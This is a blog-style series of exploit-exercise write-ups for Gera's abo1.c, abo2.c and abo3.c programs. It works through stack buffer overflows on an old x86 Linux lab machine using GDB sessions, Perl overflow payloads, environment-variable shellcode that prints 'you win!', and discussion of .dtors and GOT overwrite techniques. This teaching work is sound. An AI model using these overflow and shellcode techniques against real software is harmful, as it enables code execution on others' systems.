As always seems to be the case with these exploits, we have to ask ourselves what it is within the program’s execution that we control. Where does the program accept input from the user, and what does that mean to us? In this case, the program is using the ever-awesome strcpy function, which of course does not do a bounds check, and is copying a bunch of our data to the stack (as much as we want). We would typically move forward with overwriting the main stack frame’s return address, and controlling execution that way. Unfortunately, there is a pesky call to exit which we first encountered in the last example that will prevent us from doing that.

So we’ll have to go some other route. The obvious candidate to me is the call eax instruction. If we can somehow control the contents of the eax register at that point, we can take control of execution, and run arbitrary code. I think this particular exercise contains an important lesson; sometimes the actual high level code can be harder to understand than the disassembled code. I personally feel that this is the case here. If we only pay attention to what’s in the debugger, this is actually not such a tricky exercise.

We know fn is a function pointer that is called. In the deadlisting, it resides at ebp-12, and buf starts at ebp-0x118 (280 bytes below ebp), so fn sits 280 - 12 = 268 bytes past the start of buf. Basically, if we can control the contents of ebp-12 we can control execution. This actually turns out to be really easy: since the compiler placed fn on the stack as a local variable of main, just above buf, it is trivial to overwrite with the unbounded strcpy() call. Here is a record of the exploit.

hacking@hacking-theart:~/InsecureProgramming $ gdb -q abo3
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
0x08048414 <main+0>:    push   ebp
0x08048415 <main+1>:    mov    ebp,esp
0x08048417 <main+3>:    sub    esp,0x128
0x0804841d <main+9>:    and    esp,0xfffffff0
0x08048420 <main+12>:   mov    eax,0x0
0x08048425 <main+17>:   sub    esp,eax
0x08048427 <main+19>:   mov    DWORD PTR [ebp-12],0x80482fc
0x0804842e <main+26>:   mov    DWORD PTR [ebp-12],0x804832c
0x08048435 <main+33>:   mov    eax,DWORD PTR [ebp+12]
0x08048438 <main+36>:   add    eax,0x4
0x0804843b <main+39>:   mov    eax,DWORD PTR [eax]
0x0804843d <main+41>:   mov    DWORD PTR [esp+4],eax
0x08048441 <main+45>:   lea    eax,[ebp-0x118]
0x08048447 <main+51>:   mov    DWORD PTR [esp],eax
0x0804844a <main+54>:   call   0x804831c <strcpy@plt>
0x0804844f <main+59>:   mov    eax,DWORD PTR [ebp+12]
0x08048452 <main+62>:   add    eax,0x8
0x08048455 <main+65>:   mov    eax,DWORD PTR [eax]
0x08048457 <main+67>:   mov    DWORD PTR [esp],eax
0x0804845a <main+70>:   mov    eax,DWORD PTR [ebp-12]
0x0804845d <main+73>:   call   eax
0x0804845f <main+75>:   mov    DWORD PTR [esp],0x1
0x08048466 <main+82>:   call   0x804833c <exit@plt>
End of assembler dump.
(gdb) break 1
Breakpoint 1 at 0x8048414: file abo3.c, line 1.
(gdb) run one two
Starting program: /home/hacking/InsecureProgramming/abo3 one two

Breakpoint 1, main (argv=134513684, argc=0x3) at abo3.c:6
6       int main(int argv,char **argc) {
(gdb) x $ebp-12
0xbffff82c:     0xb8000ff4
(gdb) x buf
0xbffff720:     0x080481ac
(gdb) print 0xbffff82c-0xbffff720
$1 = 268
(gdb) delete breakpoints
Delete all breakpoints? (y or n) y
(gdb) break *0x0804845d
Breakpoint 2 at 0x804845d: file abo3.c, line 13.
(gdb) run $(perl -e 'print "A" x 268 . "BBBB";') argtwo
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacking/InsecureProgramming/abo3 $(perl -e 'print "A" x 268 . "BBBB";') argtwo

Breakpoint 2, 0x0804845d in main (argv=3, argc=0xbffff754) at abo3.c:13
13              fn(argc[2]);
(gdb) x $eax
0x42424242:     Cannot access memory at address 0x42424242
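
The 268 that GDB printed in the session above can also be read straight off the disassembly: buf starts at ebp-0x118 and fn lives at ebp-12. Here is a rough sketch of that arithmetic in C, with a toy byte array standing in for main's stack frame. The names fn_offset and fn_after_copy are mine, and the array is only a model, not the real stack.

```c
#include <stdint.h>
#include <string.h>

enum {
    BUF_BELOW_EBP = 0x118, /* lea eax,[ebp-0x118]: start of buf */
    FN_BELOW_EBP  = 12     /* mov eax,DWORD PTR [ebp-12]: fn */
};

/* Distance in bytes from the start of buf up to fn. */
size_t fn_offset(void) {
    return BUF_BELOW_EBP - FN_BELOW_EBP;
}

/* Toy model: frame[] stands in for the bytes from ebp-0x118 up to ebp.
 * Copying `len` bytes of `input` to the start of it mimics the strcpy()
 * into buf; the return value is what would then be loaded into eax. */
uint32_t fn_after_copy(const unsigned char *input, size_t len) {
    unsigned char frame[BUF_BELOW_EBP] = {0};
    uint32_t fn = 0;

    if (len > sizeof frame)
        len = sizeof frame;            /* the model stays inside its own array */
    memcpy(frame, input, len);
    memcpy(&fn, frame + fn_offset(), sizeof fn);
    return fn;
}
```

Feeding it 268 "A" bytes followed by "BBBB" gives back 0x42424242, the same value eax held at the breakpoint, while anything of 268 bytes or less leaves the modelled fn untouched.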

Since the program in question isn’t pushing and popping at all, and doesn’t appear to be modifying esp or ebp that much, we can just run the program once real quick from the beginning to populate the registers and determine the offset between our unbounded strcpy destination buf and ebp-12. Once we have the offset, we’ll re-run the program with a quick inline Perl script to print the offset-worth of junk bytes and the string “BBBB” to overwrite ebp-12. I’ve placed a breakpoint directly before the call eax instruction, and at that point we examine eax to confirm that we control execution. Now here is a quickie with shellcode that we’ll reuse from abo1.c.

hacking@hacking-theart:~/InsecureProgramming $ cat abo3shellc.txt
BITS 32             ;  Tell nasm this is 32-bit code.

  jmp short one       ;  Jump down to a call at the end.

two:
; ssize_t write(int fd,  const void *buf, size_t count);
  pop ecx           ; Pop  the return address (string ptr) into ecx.
  xor eax, eax      ; Zero  out full 32 bits of eax register.
  mov al, 4         ; Write  syscall #4 to the low byte of eax.
  xor ebx, ebx      ; Zero out ebx.
  inc ebx           ; Increment ebx to 1,  STDOUT file descriptor.
  xor edx, edx
  mov dl, 8         ; Length of the string
  int 0x80          ; Do syscall: write(1, string, 8)

; void _exit(int status);
  mov al, 1        ; Exit syscall #1, the top 3 bytes are still zeroed.
  dec ebx          ; Decrement ebx back down to 0 for status = 0.
  int 0x80         ; Do syscall: exit(0)

one:
  call two   ; Call back upwards to avoid null bytes
  db "you win!"  ; The string to print (8 bytes, no trailing newline).
hacking@hacking-theart:~/InsecureProgramming $ nasm -o abo3shellc.bin abo3shellc.txt
hacking@hacking-theart:~/InsecureProgramming $ hexdump -C abo3shellc.bin
00000000  eb 13 59 31 c0 b0 04 31  db 43 31 d2 b2 08 cd 80  |..Y1...1.C1.....|
00000010  b0 01 4b cd 80 e8 e8 ff  ff ff 79 6f 75 20 77 69  |..K.......you wi|
00000020  6e 21                                             |n!|
00000022
hacking@hacking-theart:~/InsecureProgramming $ export SHELLCODE=$(cat abo3shellc.bin)
hacking@hacking-theart:~/InsecureProgramming $ env | grep SHELLCODE
SHELLCODE=�Y1��1�C1̀�K̀�����you win!
hacking@hacking-theart:~/InsecureProgramming $ ~/booksrc/getenvaddr SHELLCODE ./abo3
SHELLCODE will be at 0xbffff9d2
hacking@hacking-theart:~/InsecureProgramming $ ./abo3 $(perl -e 'print "A" x 268 . "\xd2\xf9\xff\xbf";') two
you win!hacking@hacking-theart:~/InsecureProgramming $
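
The Perl one-liner above writes the address 0xbffff9d2 as "\xd2\xf9\xff\xbf" because x86 stores the least significant byte first. As a small sketch of the same payload construction in C (pack_le32 and build_payload are hypothetical helper names of mine, not something from gera or the book):

```c
#include <stdint.h>
#include <string.h>

/* Write a 32-bit address in x86 (little-endian) byte order. */
void pack_le32(uint32_t addr, unsigned char out[4]) {
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}

/* Fill `out` with `pad` filler bytes followed by the packed address.
 * Returns the payload length, or 0 if `out` is too small. */
size_t build_payload(unsigned char *out, size_t cap, size_t pad, uint32_t addr) {
    if (cap < pad + 4)
        return 0;
    memset(out, 'A', pad);
    pack_le32(addr, out + pad);
    return pad + 4;
}
```

With pad set to 268 and the address 0xbffff9d2, the last four bytes come out as d2 f9 ff bf. Keep in mind that none of the address bytes may be zero, since strcpy() stops copying at the first zero byte.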

Insecure Programming by Example: abo2.c, not vulnerable…o rly?

Introduction

Note 02/13/2010: This post has been a long time coming (started on 01/15 I think), I’m sorry for the delay. At first, it took me a while to (SPOILER, YOU WILL DIE ALONE) find out that abo2.c was not exploitable under x86 due to the exit() call…I saw this immediately, but it took me a while to believe it. Then, I researched other possible ways it could be exploited, and then searched around for a machine on which to test. I ended up cutting the post short from what I had intended, because I couldn’t get my hands on a PA-RISC machine to test with, and QEMU support for PA-RISC is not quite there yet. The post may be a bit rough, any mistakes are all mine, and I’ll gladly accept corrections anywhere they are needed.

After a long time of head banging (and not the good kind), I finally have something good to report in regards to abo2.c, and I figured I’d write it all up for your enjoyment. Here’s the deal, abo2.c is not vulnerable to code execution on Linux using x86 architectures (the important bit here is x86, not so much Linux). That doesn’t mean it can’t be exploited…these are definitely not the same thing. Many folks state (correctly) that abo2.c is not vulnerable under x86 and then move on.

My thought process is that in my dream job, I’d be working with more architectures than just x86, so why limit myself? Keep in mind the object of the game. You are supposed to win, not just learn a valuable lesson. Ok, so if you just move on, you get the bit about why exit() is a deal breaker…big deal. Why not learn to win? Why not examine some different techniques that could have been applied if this code had been slightly different, or different techniques that could be applied (even better) with the code completely unchanged but compiled on a different processor architecture? The goal is to win and to learn something, so let’s do both! 😉

Let’s talk about the code real quick, and why it’s not vulnerable.

/* abo2.c                                       *
 * specially crafted to feed your brain by gera */

/* This is a tricky example to make you think   *
 * and give you some help on the next one       */

int main(int argv,char **argc) {
	char buf[256];

	strcpy(buf,argc[1]);
	exit(1);
}

What’s new here, as opposed to the abo1.c exercise which we successfully exploited only…weeks ago (I haven’t posted in a while, jeebus)? The only difference is a call to the exit() function at the end of the code. That is a real deal breaker for x86 exploitation, let’s examine why this is the case quickly.

You’ll recall that we’ve been reliably exploiting all of our vulnerable programs so far by overwriting the return address which is saved on main()’s stack frame (frame #0). The thing is, exit never returns to the main() function. As a matter of fact, if you disassemble the main() function you’ll see that there is nothing below the call to exit.

(gdb) disas main
Dump of assembler code for function main:
0x080483b4 <main+0>:    push   ebp
0x080483b5 <main+1>:    mov    ebp,esp
0x080483b7 <main+3>:    sub    esp,0x118
0x080483bd <main+9>:    and    esp,0xfffffff0
0x080483c0 <main+12>:   mov    eax,0x0
0x080483c5 <main+17>:   sub    esp,eax
0x080483c7 <main+19>:   mov    eax,DWORD PTR [ebp+12]
0x080483ca <main+22>:   add    eax,0x4
0x080483cd <main+25>:   mov    eax,DWORD PTR [eax]
0x080483cf <main+27>:   mov    DWORD PTR [esp+4],eax
0x080483d3 <main+31>:   lea    eax,[ebp-0x108]
0x080483d9 <main+37>:   mov    DWORD PTR [esp],eax
0x080483dc <main+40>:   call   0x80482c4
0x080483e1 <main+45>:   mov    DWORD PTR [esp],0x1
0x080483e8 <main+52>:   call   0x80482d4
End of assembler dump.

What this means is that execution never returns to the original program from exit. You can verify this behavior yourself by trying to set a breakpoint after exit, or by trying to step over the call to exit; you’ll see that the program merely exits. We can’t overwrite the return address and have it matter, because the processor will never get back there. Game over man, game over.

The only way to beat this would be to prevent exit() from being called, which is a valid strategy that we should explore. To me, that still fulfills the idea of “gaining control”, sometimes preventing a program from doing something is just as important as making a program do something else…you think that all the crackers out there make programs authenticate themselves fraudulently, or just prevent them from authenticating the validity of the license? Either path has merit.

Insert Coin to Continue

I was a big fan of arcade games growing up. I had a mean hadouken and dragon punch. Part of getting pretty good at arcade games was not giving up. Keep putting in coins. Keep playing. Get better. If some bastard had the machine monopolized and was beating all comers, well, beg your parents for change, because nothing would make you good faster than getting the tar kicked out of you. For me, abo2.c is that bastard at the machine.

If I have one regret about how I handled this exercise, it’s that I spent too much time pondering and not enough time on the debugger. Too much time Googling, not enough time GDBing. This exercise taught me to not be afraid of disassembling everything, even libc calls, to determine the flow of execution, and it also taught me that the assembled code is really what matters. In the end, I wasted a lot of time re-thinking thoughts when I already knew the answer, abo2.c was NOTVULN on x86 Linux (at least, not vulnerable to code execution…a Denial-of-Service condition exists of course by way of segmentation fault). Once a friend helped me see that this was the case (thanks @kpyke), I resolved to beat the program anyway, in any way I could. I also learned some new stuff I’d like to show you which looked at first blush like solutions on x86, but ended up being inadequate.

What Could Have Been

From “Overwriting the .dtors section.” by Juan M. Bello Rivas:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

static void bleh(void);

int
main(int argc, char *argv[])
{
        static u_char buf[] = "bleh";

        if (argc < 2)
                exit(EXIT_FAILURE);

        strcpy(buf, argv[1]);

        exit(EXIT_SUCCESS);
}

void
bleh(void)
{
        printf("goffio!\n");
}

This paper details how to exploit situations in which you cannot control execution via arbitrary memory writes OR return address overwrites. I learned a lot from reading it even though it wasn’t a solution for abo2.c on x86. I suggest you read it as well, and I figured it was worth outlining the kind of program it would have been a solution for.

Note the differences; he’s declared the buf character array as a static variable, and declared it initialized (with value/data) as well. When he does this, the variable is no longer located on the stack, since by definition a static variable must keep its value for the whole lifetime of the program rather than disappearing with a stack frame. The variable ends up residing in the .data section of the executable file, and in older versions of GCC (used at the time of the writing of the paper, but no longer the case since at least 2006, if not earlier) .data comes before .dtors in memory.

What is .dtors? .dtors is short for “destructors” (while .ctors is for “constructors”). These are not part of the C language itself; they are GCC function attributes you can assign to a function to have it executed automatically before main() starts (constructor) or when the program exits (destructor), for instance to clean up memory allocated on the heap, which C does not do automatically. The .dtors and .ctors sections are how these older versions of GCC implement constructors and destructors in the ELF file format. Even if there are no constructor or destructor attributes defined in the program, GCC still emits the .dtors section in the ELF file; the list is just empty. At exit, the program walks the list of addresses stored in .dtors and calls each one: the list starts with the marker 0xffffffff and ends at the first 0x00000000 entry, so an empty list calls nothing. Here is what an empty .dtors section looks like:

$ objdump -s -j .dtors bleh

bleh:     file format elf32-i386

Contents of section .dtors:
 804955c ffffffff 00000000                    ........

To make it quick(er), if we overwrite the value 00000000 with an address containing instructions, that address will be jumped to on program exit. If we place our shellcode in an environment variable (see my post on abo1.c or stack5.c for details), we can simply overwrite with the address of the shellcode and execute whatever we wish, or as in the author’s example we can redirect execution flow to another function in memory that otherwise would not be hit. Remember that our statically-declared variable buf is right next to .dtors in memory, and since strcpy() is not doing bounds checking, we can overwrite it after we determine the offset and execute arbitrary code. The paper really is a fun read, I suggest you take a look.
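
If you have never seen the constructor and destructor attributes in action, here is a minimal sketch of my own (not taken from the paper). The function names are made up. One assumption to keep in mind: modern toolchains generally register these functions through .init_array and .fini_array rather than .ctors and .dtors, so this shows the language feature, not the old section layout the paper attacks.

```c
#include <stdio.h>

static int setup_ran = 0;

/* GCC/Clang extension: runs before main(). */
__attribute__((constructor))
static void setup(void) {
    setup_ran = 1;
}

/* GCC/Clang extension: runs after main() returns or exit() is called. */
__attribute__((destructor))
static void teardown(void) {
    puts("teardown ran at exit");
}

/* Lets a caller check that the constructor already ran. */
int setup_has_run(void) {
    return setup_ran;
}
```

Nothing in the program ever calls setup() or teardown() by name; the runtime finds their addresses in a table and calls them. A table of code addresses sitting in writable memory is what made .dtors such an attractive target.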

It is also worth mentioning one more paper that is unfortunately not applicable here, but is still an interesting read. “How to hijack the Global Offset Table with pointers for root shells” by c0ntex is an excellent overview of the concepts regarding the Procedure Linkage Table and the Global Offset Table, two ripe areas for controlling execution if you are fortunate enough to be able to overwrite the pointers contained therein. In short, the PLT and GOT are essentially how a given program knows where to find a shared library call (such as exit in libc). If we could overwrite the pointers in the table, we could execute arbitrary code in place of the call to exit(). Unfortunately, abo2.c does not present an opportunity to do this, nor do stack buffer overflows in general. A format string bug would probably be the best way to execute this attack, so far as I know, but it’s still a very interesting read that I encountered doing research for this article.
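
As a very rough mental model of why a writable table of function addresses is interesting, here is a toy sketch in C. To be clear about the assumptions: this is not how the real PLT/GOT is laid out, toy_got is just a one-element array I made up, and the two stub functions return numbers so the redirection is visible.

```c
typedef int (*lib_fn)(void);

static int real_exit_stub(void) { return 1; }  /* stands in for libc's exit() */
static int attacker_code(void)  { return 2; }  /* stands in for shellcode */

/* Toy "GOT": one slot holding the address the program believes is exit(). */
static lib_fn toy_got[1] = { real_exit_stub };

/* What a PLT stub does in spirit: jump through the table entry. */
int call_exit_via_table(void) {
    return toy_got[0]();
}

/* What an arbitrary 4-byte write aimed at the table entry would achieve. */
void overwrite_entry(lib_fn target) {
    toy_got[0] = target;
}

/* Hypothetical helper so callers can obtain the replacement address. */
lib_fn attacker_entry(void) {
    return attacker_code;
}
```

Before the overwrite, call_exit_via_table() lands in the stub for the real function; after overwrite_entry(attacker_entry()), the very same call lands somewhere else. The calling code never changes, only the table does.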

Architecture is Important

All of our examples so far have been exploited on an x86 virtual machine (powered by the great free tool VirtualBox) running an old, vulnerable version of Linux with many security features disabled, such as non-executable stack protection, or address space layout randomization. But in this case, we’ve merely been defeated by the design of the x86 stack. Due to the way the stack is arranged in memory, and the fact that our overflowed buffer is located therein, there is nothing we control that gives us any value.

What if we compiled it on a different architecture? Would it work then? How about an architecture that arranges its stack differently? Some architectures lean on registers more than x86 does for call bookkeeping (ARM, for example, places the return address in a link register on a call rather than pushing it straight to the stack, though nested calls still end up saving it in memory), which I suppose speeds things up (just speculation, I know dick all about most of this stuff ;-), I’m sure there’s a trade-off though). Some processors do not grow the stack from high-to-low memory addresses; they instead grow it from low-to-high, just like other constructs such as the heap. PA-RISC is one of these. What this means is that on those processors the return address of the function that owns the buffer is out of reach, because it sits at a lower address than the beginning of the vulnerable buffer and the overflow writes upward. That does not mean that the processor is a safe haven for unbounded functions, though, not at all.

You probably already realize what this means if you’ve been following along and paying attention. This means that we can overwrite the return address of the strcpy() function itself. This means that we never need to leave the strcpy() function to gain control (conceptually, at least), and that we don’t have to wait for the end of the program (main’s return address) like we do on x86. This means that we’ll never get to the exit() call, and that abo2.c is exploitable under certain conditions. In researching this technique, I found out that it’s been done through Phrack #58 Article 11 by Zhodiac, and that it’s a really good read if you’ve never done any low level work on “exotic” architectures. So, instead of doing the exploit myself (mainly due to lack of resources, PA-RISC machines are ~$200.00 on eBay and virtualization is essentially non-existent), I’ll just recommend you give Zhodiac’s paper a read.
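
The whole argument boils down to one question: does the saved return address we care about sit above or below the buffer? Here is a tiny sketch of that check in C. The function name overflow_reaches is mine, and the addresses in the usage note that are not from the abo1.c GDB session are invented purely for illustration.

```c
#include <stdint.h>

/* True if writing `len` bytes upward from `buf` fully covers
 * the 4-byte slot that starts at address `slot`. */
int overflow_reaches(uint32_t buf, uint32_t len, uint32_t slot) {
    return slot >= buf && (uint64_t)slot + 4 <= (uint64_t)buf + len;
}
```

On x86, with buf at 0xbffff510 and main's saved EIP at 0xbffff61c (the values from the abo1.c session), a 272-byte write reaches the slot, while a slot below the buffer (say a made-up 0xbffff4fc for strcpy()'s own return address) is never reached no matter how long the write is. On a stack that grows upward the roles swap: the frame of strcpy() lands above the buffer, so its return address becomes the reachable one.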

Man, I’m glad this post is done with. Procrastination is the devil, on to the next challenge!

Insecure Programming by Example: Advanced Buffer Overflows 1

Introexecuduction

Ok, after a nice break, I’m ready to…break :-). I have a couple of Python related posts in my docket, but today we’re going to start work on the next exploit exercises by Gera in his Insecure Programming by Example series, Advanced Buffer Overflows! I hope they aren’t too advanced. This should be refreshing to write about, because I haven’t done any of these yet. On to the code!

Gera says:
Advanced Buffer Overflow #1

blind obedience

What would happen if you store 512 characters where there is only space for 256? You may claim that you can’t, and you’ll be right, but still, there are situations that, unconsciously, you tell the micro to do so, and he can only but obey you… and he’ll do his best without thinking of side effects. Now is when we get technical, fasten your seat belts, this turbulence will last forever.

What defines a buffer overflow is the copy of a memory region into another region not big enough to contain it.

/* abo1.c                                       *
 * specially crafted to feed your brain by gera */

/* Dumb example to let you get introduced...    */

int main(int argv,char **argc) {
        char buf[256];

        strcpy(buf,argc[1]);
}

Gera continues:
This is a good and simple abo: on execution this program will copy the contents of argc[1] *1, whatever it is, into the reserved 256 bytes named buf, strcpy() will not do any checks of any kind, it will just copy bytes from source to destination, from argc[1] to buf, until it finds a zero. Here, a chance is given for us to supply a longer-than-expected argc[1] to write in memory past the end of the reserved space named buf. Why is this a security problem? becouse we can change data that we shouldn’t be able to, and usually, this data we can change has a very special meaning for the micro, and by exploiting this meaning, we can confuse the micro and make it do what we want. That’s the secret, go get a debugger, a compiler, and all the tools you think you’ll need, and find out what’s the data after buf and why it’s so important to be able to modify it.

1 – argc and argv are just names for main’s arguments, they just name chunks of bits in memory, their names are not meaningful by their own but for their context.

On a side note, this compiles without an #include <string.h> (the header that declares strcpy()) because older C compilers accept a call to an undeclared function by implicitly declaring it, and the linker then finds strcpy() in libc. It works with even a really old version of gcc, though you may get a warning. Either way, the notes that Gera provides are well worth reading and understanding. This is actually a fairly easy piece of code to exploit, given what we’ve worked with previously in the stackN.c series. We’ll actually re-use our shellcode from that series to print out “you win!” upon successfully exploiting this program. If you haven’t already done so, go read the stack5.c post I did earlier where I delve into the generation of the shellcode we’re going to use here.

Exploitimitation

The only change of note for this vulnerable piece of software is the use of the strcpy() function. You may remember we discussed earlier why this function, along with gets() and a bunch of others, is not a good idea to use. It is the use of the strcpy() function that allows us to overflow the buffer, as it does not do bounds-checking on input to the buffer. This function just copies whatever you give it to the buffer, the copy continues unchecked, and can be used in a similar way as our gets() function was used to overwrite other areas on the stack (or beyond) to gain control over EIP and hence program execution.
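
To see why strcpy() is the problem, it helps to write out what it does. The following is a sketch of my own, not libc's actual implementation: unchecked_copy behaves like strcpy() in spirit, and checked_copy is a hypothetical variant that is told how big the destination is.

```c
#include <stddef.h>
#include <string.h>

/* What strcpy() does in spirit: copy until the zero byte, with no idea
 * how large dst is. Safe only if the caller guarantees dst is big enough. */
char *unchecked_copy(char *dst, const char *src) {
    char *p = dst;
    while ((*p++ = *src++) != '\0')
        ;
    return dst;
}

/* A checked variant: refuse the copy if src (plus its terminator)
 * does not fit in dst_size bytes. Returns 0 on success, -1 otherwise. */
int checked_copy(char *dst, size_t dst_size, const char *src) {
    size_t needed = strlen(src) + 1;
    if (needed > dst_size)
        return -1;
    memcpy(dst, src, needed);
    return 0;
}
```

The first function has no parameter that could even carry the size of the destination, so it cannot stop early. The second one rejects an 8-character string for an 8-byte buffer, because the terminating zero needs a ninth byte.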

What we’re going to do is this:

  1. Determine the location in memory of the variable buf.
  2. Determine the location in memory of the saved EIP within the stack frame for the call to the main() function, using our debugger GDB.
  3. Determine the offset (number of bytes) we need to write before reaching the saved EIP, by subtracting the beginning address of the buf array from the address of the saved EIP. It’s worth noting here that the stack grows from higher addresses to lower addresses (whereas the heap grows in the reverse direction), but a buffer on it is still filled from low-to-high addresses just like anything else, which is something that will take you a while to get into your head permanently. A good (but old) document describing this is at tldp.org, and a thorough overview can be found at linux-mm.org.
  4. Through the first command line argument (a.k.a. argc[1]), send data which will hopefully cause the program to print out “you win!” when main() returns.

Let’s get started by compiling the code and examining it in GDB to determine the locations in memory we are concerned with. I will be compiling the binary with the -static option, which links the libc code directly into the binary instead of resolving it through shared libraries at runtime; it makes things a bit easier to see sometimes in GDB, but do whatever works for you.

hacking@hacking:~/InsecureProgramming $ gcc -ggdb -static -o abo1 abo1.c
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set disassembly-flavor intel
(gdb) list
1       /* abo1.c                                       *
2        * specially crafted to feed your brain by gera */
3
4       /* Dumb example to let you get introduced...    */
5
6       int main(int argv,char **argc) {
7               char buf[256];
8
9               strcpy(buf,argc[1]);
10      }
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) backtrace
#0  main (argv=2, argc=0xbffff864) at abo1.c:10
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/8x buf
0xbffff510:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff520:     0x41414141      0x41414141      0x41414141      0x41414141

We can see in the info frame and x/8x output the addresses of the various points we are interested in (the saved eip at 0xbffff61c and buf at 0xbffff510); also we can see that after we have already returned from the strcpy() function, the buffer does indeed contain a bunch of “A” characters (0x41). Now that we know where everything is, we can do a bit of arithmetic and determine what our offset is, and then we can get along to deploying our simple shellcode to take control of the EIP register and make it do what we want.

hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAA
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAA

Breakpoint 1, main (argv=2, argc=0xbffff864) at abo1.c:10
10      }
(gdb) info frame 0
Stack frame at 0xbffff620:
 eip = 0x8048251 in main (abo1.c:10); saved eip 0x8048455
 source language c.
 Arglist at 0xbffff618, args: argv=2, argc=0xbffff864
 Locals at 0xbffff618, Previous frame's sp is 0xbffff620
 Saved registers:
  ebp at 0xbffff618, eip at 0xbffff61c
(gdb) x/x buf
0xbffff510:     0x41414141
(gdb) print 0xbffff61c - 0xbffff510
$1 = 268
(gdb) quit
The program is running.  Exit anyway? (y or n) y
hacking@hacking:~/InsecureProgramming $ perl -e 'print "A" x 268 . "BBBB\n";'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
hacking@hacking:~/InsecureProgramming $ gdb -q abo1
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break 10
Breakpoint 1 at 0x8048251: file abo1.c, line 10.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Starting program: /home/hacking/InsecureProgramming/abo1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Breakpoint 1, main (argv=0, argc=0xbffff764) at abo1.c:10
10      }
(gdb) next
0x42424242 in ?? ()

Now that we have proven control over EIP by overflowing it with “B” characters (0x42), we can deliver the shellcode as described in previous tutorials.
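
The arithmetic from the GDB session above is simple enough to write down as code. This is just a sketch with names of my own choosing; the addresses in the usage note are the ones GDB reported for this particular build and environment, so treat them as examples and not constants.

```c
#include <stdint.h>

/* Bytes of filler needed before the first byte of the saved EIP. */
uint32_t offset_to_saved_eip(uint32_t saved_eip_addr, uint32_t buf_addr) {
    return saved_eip_addr - buf_addr;
}

/* The part of the offset that is not buf itself
 * (whatever the compiler put between buf and the saved EIP). */
uint32_t bytes_beyond_buf(uint32_t offset, uint32_t buf_size) {
    return offset - buf_size;
}
```

With the saved EIP at 0xbffff61c and buf at 0xbffff510 the offset is 268. Of those, 256 bytes are buf and the remaining 12 are 8 bytes of padding plus the 4-byte saved EBP at 0xbffff618.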

Whiskey Tango Foxtrot?

There is one problem left to solve: it appears that the variable addresses for the regular runtime of the program differ from the variable addresses while in GDB. Since this code doesn’t print out the variable addresses at runtime like the stackN.c examples, and since we don’t want to modify the source to do so in the spirit of the exercise, we have to find another reliable way to exploit the program. There are some tricks we can employ here by placing our shellcode into an environment variable, and then using the getenv() C library call to determine the location of that environment variable in the program’s memory. All programs executed from Bash (or any shell, really) seem to load the environment variables defined in the shell (viewable with the env command) directly into the memory of any process run as a child of that shell. Once we have the location of the shellcode in the environment variable, we can overwrite the saved EIP with that location and successfully exploit the program. This technique is described in greater detail in Hacking: The Art of Exploitation, 2nd Edition by Jon Erickson (if you can’t tell, this is a pretty good book). Indeed, the getenvaddr.c we’re going to use below is provided for free from the book’s website. But if you’re following along with me here, you should really read this book in its entirety.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}
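
The one line in getenvaddr.c that deserves a second look is the adjustment for the program name. Here is the same arithmetic pulled out into a small function, as a sketch. The function name and the example values in the usage note are hypothetical; only the formula comes from the code above.

```c
#include <stdint.h>
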